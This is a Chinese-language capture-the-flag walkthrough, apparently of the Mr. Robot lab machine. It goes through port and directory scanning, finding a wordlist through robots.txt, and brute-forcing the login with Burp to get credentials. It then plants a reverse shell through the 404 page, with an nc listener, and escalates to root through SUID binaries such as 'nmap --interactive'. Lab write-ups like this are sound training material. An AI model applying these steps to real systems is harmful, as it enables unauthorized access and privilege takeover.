Robot协议弱密码登录后台
- 定义:robots文件是一个.txt纯文本文件。在这个文件中网站管理者可以声明该网站中不想被robots访问的部分,或者指定搜索引擎只收录指定的内容。因此,robots的优化会直接影响到搜索引擎对网站的收录情况。
- 渗透测试的步骤:
- 第一步
查看机器的ip地址eg:10.168.1.x - 第二步
用nmap扫描服务器 扫描端口观察是否有对应的漏洞可以利用
Nmap -sP x.x.x.x (发现主机)
Nmap -A x.x.x.x(扫描可以利用的端口)
如果有80端口或者有22端口观察是否可以利用
80端口可用dirb扫描目录观察是否有相应的路径
如果有字典或者有.txt文件时可以拷贝或下载下来观察是否有有效的数据
扫描结果:
图片:
80端口 dirb扫描目录 观察是否有相应的路径观察有对应的目录
其中有login 可以登录后台,有爬虫协议robots
观察robots文件可以发现其中有一个字典文件和一个flag文件
直接通过url对应的目录文件可以获取第一个flag
下载后可以看见是一串用户名和密码,并且有重复的字样
用sort方法去重
Sort -u fsocity.dic > dic.txt
如果有login登录页面可以尝试用暴力破解的方式登录
设置burp(kali打开burp设置代理)
对获取的字典进行暴力破解
用Burp可以爆破
使用方法:
-
抓包 ,Burpsuite-interuder模块
-
点击一个
-
设置变量
-
设置载荷
-
Run
-
查看结果,观察数据长度的变化
账号:elliot
密码:ER28-0652
4.第四步,登录后台,编辑404页面
保存
5.第五步
kali监听端口
nc -lvvp 端口号
开始监听端口(4444)
反弹shell
第七步
改成可交互式页面
python -c ‘import pty; pty.spawn(“/bin/bash”)’
查找flag
发现权限不够
第八步提高访问权限
发现有md5加密(百度一下MD5破解)
补充 (提高权限(suid))
- 查看具有suid的二进制可执行文件:find / -user root -perm -4000 -print 2>/dev/null
- 已知的可用来提取的linux可执行文件列表:nmap vim find bash more less nano cp
- Eg:nmap进入可交互模式(2.02-5.21):nmap --interactive
- 提权操作:!sh
最后一个flag